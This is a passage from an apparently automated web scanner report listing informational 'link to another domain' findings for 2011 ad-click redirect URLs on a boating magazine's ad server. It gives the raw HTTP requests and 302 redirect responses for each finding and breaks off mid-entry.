<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.281. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.282. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:27:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.283. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.284. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.285. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

20.286. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.287. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.288. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.289. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.290. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.291. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.292. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.293. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:30:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.294. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.295. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

